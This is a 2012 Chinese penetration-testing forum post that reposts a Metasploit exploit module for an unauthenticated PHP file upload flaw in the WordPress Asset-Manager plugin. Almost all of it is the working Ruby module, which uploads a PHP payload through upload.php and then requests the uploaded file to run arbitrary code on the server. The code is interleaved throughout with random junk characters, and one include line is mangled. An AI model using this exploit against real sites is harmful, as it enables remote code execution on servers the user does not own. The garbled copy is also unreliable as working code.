中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]

作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。3 u# U- E1 T5 t, P

) G6 Z; r7 u# a) p##, c; w- z: N) _0 o5 V! e3 |
# This file is part of the Metasploit Framework and may be subject to
( @" `; O) a3 c; T# redistribution and commercial restrictions. Please see the Metasploit
$ D+ ^$ D5 }+ s, ~. L* P# O# Framework web site for more information on licensing and terms of use.) k) t( l( J2 y; r; L5 F
#   http://metasploit.com/framework/
, f# K7 T* G3 I1 n2 n: i4 s##6 u2 p5 s+ h3 U

/ u5 w0 C  A# _/ T  z" grequire 'msf/core') `# P& ]/ h) [/ B: [4 i) Y% G
require 'msf/core/exploit/php_exe'' Y) r3 R. I- I+ @

2 I+ S" }& x% W! |0 H4 iclass Metasploit3 < Msf::Exploit::Remote5 @+ |# B+ t+ g9 p8 n( Y+ [
  Rank = ExcellentRanking
) z3 @) R  z' i$ T# J; V4 K' _. } 9 y6 H, }: S7 o& Z3 {, O
  include Msf::Exploit::Remote::HttpClient- x" _8 \+ h9 Z& ?5 W7 P- r8 M
  include Msf::Exploit:hpEXE
# i+ L1 I7 h/ K; b
. Q2 k- ^% |; w; l# o' T! Y  def initialize(info = {})
  M- W& b# B- j2 T- T% _    super(update_info(info,3 B( `9 w7 y  ]- G0 i6 Q2 D' X
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
  f/ r/ V' Q9 Q' h' d/ T      'Description'    => %q{% S, @. B0 A. s, w  C! g9 K3 f
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
3 h0 ?! I' u- c7 r( f; h- Y        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
' T) b3 a) k: T- e        temp directory without authentication, which results in arbitrary code execution.
0 @1 L7 _! [$ f  z/ H' ~* G      },8 K$ J6 g' X& I. g1 ?% G
      'Author'         =>
4 a. O6 R, S# F$ l" I* t        [% p* e8 r8 B: Q5 S* e# K( j
          'Sammy FORGIT', # initial discovery3 Q# h* ~6 e) f
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
  p* A* M6 e$ r% {- Y8 j        ],; B2 t, P! ]7 @( C5 W4 T
      'License'        => MSF_LICENSE,: U6 q4 S$ p2 r; Z3 b
      'References'     =>
' u! }  q8 @. A9 `        [
0 L: d3 M1 M. e* u- V8 Z! h3 Q1 y          [ 'OSVDB', '82653' ],
# K: s! z! Q5 Y) w% R$ W5 m          [ 'BID', '53809' ],
% L* S9 o2 D' X1 a. `2 D* e( G          [ 'EDB', '18993' ],9 }4 e# B& f; G) u4 N
          [ 'URL', 'http:// www.myhack58.com /' ]
7 j$ p9 v0 u( V4 v: ?+ \+ d        ],
6 G# [, K% r) @5 W      'Payload'       =>
/ J; j) V3 W- D3 Y# z) [+ p' J        {
8 w& v: N5 O3 X9 K5 a; H3 ?          'BadChars' => "\x00",
5 n/ @9 X+ F6 ~5 G2 }6 s        },) N3 k- e* `) n/ d! ^# Y* v: A
      'Platform'       => 'php',
; @1 G5 n3 W7 r, q5 d- U& e8 P      'Arch'           => ARCH_PHP,& @8 N9 b% e5 Q
      'Targets'        =>
9 s/ F  A$ x0 g2 v1 M' r        [
- s5 ^1 Z6 S/ A6 z% f          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
4 ?+ M* {. K6 \# a  \          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]% C6 n. T9 I2 h( J. i
        ],0 ~/ f6 W7 F2 L. u4 _9 z
      'DefaultTarget' => 0,
. w; {5 v0 Y5 t1 \  u      'DisclosureDate' => 'May 26 2012'))
9 ]4 q* C2 e; E4 o$ k ) L% U( {* T6 I) e; f, v1 P* Q
    register_options(0 }- C, F" ^. b7 X* L0 q
      [  R3 o9 M. v; `6 ^' o3 P* \$ l+ Q
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
  k! Y0 @5 t( O      ], self.class)+ x9 A& w; Z+ y; u7 t8 L
  end
( j# \4 ^; P3 g; C& b- z# G, E6 _
( {/ C2 B2 E$ ]0 G2 b  def exploit; J8 ^6 U3 Y9 @5 V2 X8 |3 i) W( V* j, e
    uri =  target_uri.path
' [8 {" r6 O# s' q9 \    uri << '/' if uri[-1,1] != '/') _: c/ y) U1 c
    peer = "#{rhost}:#{rport}"
' J* c% e, C( v) u    payload_name = "#{rand_text_alpha(5)}.php"
7 m9 k- r4 [( y4 {0 f    php_payload = get_write_exec_payload(:unlink_self=>true)0 n& c$ W& }+ V" Y

* Z! z& z. D. z! W' W" t    data = Rex::MIME::Message.new
5 l4 z" s6 l, Z- y, A    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
; |3 Z7 R' ^8 y9 M    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
  }+ G/ `9 f9 A% ^
$ B: ^5 u9 K5 A( u/ M& W* S. j+ G( l5 ^    print_status("#{peer} - Uploading payload #{payload_name}")8 ?, A4 `9 v# j" v
    res = send_request_cgi({
! D8 R* F8 b; i      'method'  => 'POST',7 h3 L- ?% G* S9 z% Q5 N
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
2 j7 |# v5 Q3 I2 c      'ctype'   => "multipart/form-data; boundary=#{data.bound}",$ `' K& @; w  i! I9 \
      'data'    => post_data' k( x) ~8 D: h5 W
    })4 h4 ^0 B; n/ A, C

8 G( n! t. k0 D! g+ Z) |    if not res or res.code != 200 or res.body !~ /#{payload_name}/- C% H5 ]* t4 ?( b8 i; w
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
: B" w. F1 [( j9 g" f7 Pend
$ s0 i* J: M8 c) ~+ |$ U + ?' O% X* ^( V: H5 k3 t' L3 p& V
    print_status("#{peer} - Executing payload #{payload_name}")
+ B2 e' B$ Y( {. N$ `7 V1 \  U! P8 E    res = send_request_raw({) u0 a, g+ i5 K$ s( N/ f
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
0 _2 z# G7 ^6 Z      'method'  => 'GET': y* j$ B/ G! s# U  O6 o, j1 {
    })
# I4 }- t6 n! Z3 T
% G4 }$ q4 `9 C/ v* M& O3 C& y1 i    if res and res.code != 200
' p% A. x$ m, y# Y$ T; R      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
5 p' H; E$ M% G  b! _! n4 F    end
3 ~) ~' _% w( g1 h4 W  end
5 I# L! A! u* E# x# t, z$ ]6 Xend
" ?6 D1 o$ {4 N9 e! j




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2